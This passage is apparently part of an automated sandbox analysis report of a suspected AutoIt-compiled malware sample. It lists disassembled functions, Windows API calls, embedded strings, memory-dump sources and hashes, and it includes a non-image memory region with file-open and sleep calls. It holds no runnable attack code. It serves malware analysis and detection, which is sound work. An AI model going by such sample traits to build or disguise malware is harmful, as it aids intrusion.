Part of subcall function 00743041: GetSysColorBrush.USER32(0000000F), ref: 00743074
Part of subcall function 00743041: RegisterClassExW.USER32(00000030), ref: 0074309E
Part of subcall function 00743041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007430AF
Part of subcall function 00743041: LoadIconW.USER32(000000A9), ref: 007430F2

Strings

AutoIt v3, xrefs: 00743B05
#, xrefs: 00743AFB
0, xrefs: 00743AF4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 3f2a4a89d8c55f9e38454c7d56b796ed78e7efb877a0d1742e78d0adc6d9e246
Instruction ID: faced2dcbdc0a82a563add040b02e1000a36c22b242c5d2a2742f8d8fab7a445
Opcode Fuzzy Hash: 3f2a4a89d8c55f9e38454c7d56b796ed78e7efb877a0d1742e78d0adc6d9e246
Instruction Fuzzy Hash: 5E213771A00308EFEB50DFA4EC19B9E7FB2FB08711F00412AE504A62A1D3B95A508FA4

Function 00743766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 007437FB
/ErrorStdOut, xrefs: 0074387D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007437AE
/AutoIt3ExecuteScript, xrefs: 007438BC
/AutoIt3ExecuteLine, xrefs: 007438A7
/AutoIt3OutputDebug, xrefs: 00743892
CMDLINE, xrefs: 00743822

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 44c755ab6a3bb4f941026a4142828e57644a9eabc54a1ceae0fce09a7ba2bf1a
Instruction ID: 3cad82690aa0249e3e18cb46d8aa2e7d1a2bac5e0969f11b1d5271c95eeb0359
Opcode Fuzzy Hash: 44c755ab6a3bb4f941026a4142828e57644a9eabc54a1ceae0fce09a7ba2bf1a
Instruction Fuzzy Hash: 0CA14D7191022DEACF14EBA4DC99EEEB779BF15310F440429F41AB7192DF786A08CB60

Function 0074301C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 72
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00743074
RegisterClassExW.USER32(00000030), ref: 0074309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007430AF
LoadIconW.USER32(000000A9), ref: 007430F2

Strings

0, xrefs: 00743056
+, xrefs: 0074305D
AutoIt v3 GUI, xrefs: 00743090
TaskbarCreated, xrefs: 007430A4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 14c48259e065e47acd7e7eba7fb835620a9c7c838ca6c82bce66c91b8f33866c
Instruction ID: 8ac24f24cef688a738a2e6b7f8e2c9fdeda1744af6a960fc4237c2004d7481be
Opcode Fuzzy Hash: 14c48259e065e47acd7e7eba7fb835620a9c7c838ca6c82bce66c91b8f33866c
Instruction Fuzzy Hash: 493118B1940309EFDB909FA4D849ADEBBF5FB08710F14812EE950E6260D3B94581CF65

Function 00743041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00743074
RegisterClassExW.USER32(00000030), ref: 0074309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007430AF
LoadIconW.USER32(000000A9), ref: 007430F2

Strings

0, xrefs: 00743056
+, xrefs: 0074305D
AutoIt v3 GUI, xrefs: 00743090
TaskbarCreated, xrefs: 007430A4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: ab78ebff4851cbc521fa837c69892e6e47c25caaf85097b92e492d5a59f946ac
Instruction ID: 3c7fb71ede5ff0047350da2c4de541ccf2a6b987433e1148df124e5de3ce6e8b
Opcode Fuzzy Hash: ab78ebff4851cbc521fa837c69892e6e47c25caaf85097b92e492d5a59f946ac
Instruction Fuzzy Hash: 0C21C4B1901718AFDB40DFA4EC89B9EBBF5FB08700F00812AFA11E62A0D7B545448FA5

Function 012FBDB0 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012FBDF5

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: c92751e36be6fc6b91cc6ec88120fd2562201b30df37646b47f73d040f6dee12
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: D1510B75A20209FBDB20DFB4CC49FDEB779AF48700F108618FB0AEA180DA759644CB60

Function 00747285 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0077EA39
7722D0D0.COMDLG32(?), ref: 0077EA83

Part of subcall function 00744750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00744743,?,?,007437AE,?), ref: 00744770

Part of subcall function 00760791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007607B0

Strings

AutoIt script files (*.au3, *.a3x), xrefs: 0077EA67
au3, xrefs: 0077EA7C
Run Script:, xrefs: 0077EA58
X, xrefs: 0077EA51

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: NamePath$7722FullLong_memset
String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
API String ID: 1752364830-1954568251
Opcode ID: f935185efe33f735a9bf218d4c42cfb3e31075e2acc6bb7c538583fe8488c132
Instruction ID: 5212bc6ef2e62dcb261a3f0fb4936d07ada0a842de6135ab0dc3d2a092c0898d
Opcode Fuzzy Hash: f935185efe33f735a9bf218d4c42cfb3e31075e2acc6bb7c538583fe8488c132
Instruction Fuzzy Hash: A2219371A04248DBCF459F94DC49BEE7BFDAF49714F008059E908A7241DBBC5989CFA2

Function 007439D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00743A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00743A24
ShowWindow.USER32(00000000,?,?), ref: 00743A38
ShowWindow.USER32(00000000,?,?), ref: 00743A41

Strings

AutoIt v3, xrefs: 007439FB, 00743A00, 00743A01
edit, xrefs: 00743A1E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: e158cd3931f2be65368094243ef11102b75fed21901f82787cce3c46c9901005
Instruction ID: 9ceb72c7c9557aacdbe6d0bf82c82634c7dcc49248516132b4f0e11de0276800
Opcode Fuzzy Hash: e158cd3931f2be65368094243ef11102b75fed21901f82787cce3c46c9901005
Instruction Fuzzy Hash: 95F03470600694BFEA705B23AC0CF2B2E7EEBC6F50B00802EF904A21B0C2751810CEB0

Function 0074686A Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00744DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744E0F

_free.LIBCMT ref: 0077E263
_free.LIBCMT ref: 0077E2AA

Part of subcall function 00746A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00746BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0077E039
/vt, xrefs: 0077E084, 0077E0BD
Bad directive syntax error, xrefs: 0077E292

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: /vt$>>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-11538893
Opcode ID: 1ba97be236aa76ba5f06f01cc545c6e17bc4c494beae9d26b65b3cc8b0d073b4
Instruction ID: 86a3f8134fde055e4b4a634ef0ce5a75e98530fb0cb6273f2bae6a39eb6b02b6
Opcode Fuzzy Hash: 1ba97be236aa76ba5f06f01cc545c6e17bc4c494beae9d26b65b3cc8b0d073b4
Instruction Fuzzy Hash: 24916171A00219EFCF04EFA4CC959EDB7B8FF09350F108569F816AB2A1DB79A915CB50

Function 0074407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0077D3D7

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

_memset.LIBCMT ref: 007440FC
_wcscpy.LIBCMT ref: 00744150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00744160

Strings

Line: , xrefs: 0077D400

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 957fa2dca3d63f83b890f13158d96e4bd3956f2131947ca6fd90a7e20f885f03
Instruction ID: 3fc59ca5bc881df0290f88ae2aea12cc8bc6605f315cf34be798bab838696bb7
Opcode Fuzzy Hash: 957fa2dca3d63f83b890f13158d96e4bd3956f2131947ca6fd90a7e20f885f03
Instruction Fuzzy Hash: D831A171108704EFD765EB60DC4AFEB77D8AF44300F20451EF589921A1DB789658CBA7

Function 0076541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0076547B
_memcpy_s.LIBCMT ref: 007654ED
__read_nolock.LIBCMT ref: 0076554B
__filbuf.LIBCMT ref: 0076556E
_memset.LIBCMT ref: 007655B2

Part of subcall function 00768B28: __getptd_noexit.LIBCMT ref: 00768B28

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 5c93cf1a89436b4872392fc927370a2d622765177efe975990474d2aefd60edf
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 9051DA70A00B45DBCB248F69D84866E7BA3AF40321F248769FC37962D1DB799D60AB41

Function 0074F76F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00760162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00760193
Part of subcall function 00760162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0076019B
Part of subcall function 00760162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007601A6
Part of subcall function 00760162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007601B1
Part of subcall function 00760162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007601B9
Part of subcall function 00760162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007601C1

Part of subcall function 007560F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00756154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0074F9CD
OleInitialize.OLE32(00000000), ref: 0074FA4A
CloseHandle.KERNEL32(00000000), ref: 007845C8

Strings

%}, xrefs: 0074F796, 0074F7A8, 0074F96E, 0074FA51

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID: %}
API String ID: 3094916012-578177530
Opcode ID: 36ae8fe0450379666a7aacd43a58b6db97eb5d544222a5a86db3738caffbdef7
Instruction ID: 3a0a04534e0e0c93a41891cb51d798a09cc832dfcf848e50f0d0028365c60e83
Opcode Fuzzy Hash: 36ae8fe0450379666a7aacd43a58b6db97eb5d544222a5a86db3738caffbdef7
Instruction Fuzzy Hash: 9081ADF0901E40CEC7C4DF69AC9969B7BE5FB99306790812AD119C73A2E7744885CF39

Function 012FD870 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

Part of subcall function 012FD760: Sleep.KERNELBASE(000001F4), ref: 012FD771

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 012FD994

Strings

U98G70OGBHRC08QHGUG5XXUUATHU, xrefs: 012FDA14, 012FDA17

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: CreateFileSleep
String ID: U98G70OGBHRC08QHGUG5XXUUATHU
API String ID: 2694422964-229659309
Opcode ID: 257ad92c63b9d273fb29a5573df72d484c2244beb4e0197990fb6d3de5d468d1
Instruction ID: f04c8a2987bae8f3e87b2090f4b39aac2b6331796b3771c34e1d652cb284c429
Opcode Fuzzy Hash: 257ad92c63b9d273fb29a5573df72d484c2244beb4e0197990fb6d3de5d468d1
Instruction Fuzzy Hash: 10619F70D1428DDAEB11DBE8C819BEEBBB89F15304F00419DE6087B2C1D6B91B48CBA5

Function 007435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007435A1,SwapMouseButtons,00000004,?), ref: 007435D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007435A1,SwapMouseButtons,00000004,?,?,?,?,00742754), ref: 007435F5
RegCloseKey.KERNELBASE(00000000,?,?,007435A1,SwapMouseButtons,00000004,?,?,?,?,00742754), ref: 00743617

Strings

Control Panel\Mouse, xrefs: 007435D2

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 3612f3f2c1b80458e4e649128440b1e8590b957cf4c2449405ffae8baface32e
Instruction ID: cdb4db237cb656fc65c2f0c4a8b94129efd81d3498cbfc016a4878443bb226af
Opcode Fuzzy Hash: 3612f3f2c1b80458e4e649128440b1e8590b957cf4c2449405ffae8baface32e
Instruction Fuzzy Hash: 1A115771610209BFDB209F64DC80EEEBBB9EF04740F128469F809D7210E3759F409BA6

Function 007A955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00744EE5: _fseek.LIBCMT ref: 00744EFD

Part of subcall function 007A9734: _wcscmp.LIBCMT ref: 007A9824
Part of subcall function 007A9734: _wcscmp.LIBCMT ref: 007A9837

_free.LIBCMT ref: 007A96A2
_free.LIBCMT ref: 007A96A9
_free.LIBCMT ref: 007A9714

Part of subcall function 00762D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00769A24), ref: 00762D69
Part of subcall function 00762D55: GetLastError.KERNEL32(00000000,?,00769A24), ref: 00762D7B

_free.LIBCMT ref: 007A971C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 27ad86cf735069efbc7944d8c9d4359ad9a026618f1501086b7b316c899d7b62
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: F2516EB1D04218EFDF259F64CC85A9EBBB9EF88300F1005AEF609A3241DB755A90CF58

Function 0076470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007647A0
__flush.LIBCMT ref: 007647C0
__write.LIBCMT ref: 007647F3
__flsbuf.LIBCMT ref: 00764821

Part of subcall function 00768B28: __getptd_noexit.LIBCMT ref: 00768B28

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 39b0db8199ffff92e0a2be78a0b001bae29cd336c29d94efe3d7388374681780
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 3B41C375B00746EBDB19DEA9C8849AE7BA5EF46360B24813DEC17C7640EB78DD408B40

Function 007444A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007444CF

Part of subcall function 0074407C: _memset.LIBCMT ref: 007440FC
Part of subcall function 0074407C: _wcscpy.LIBCMT ref: 00744150
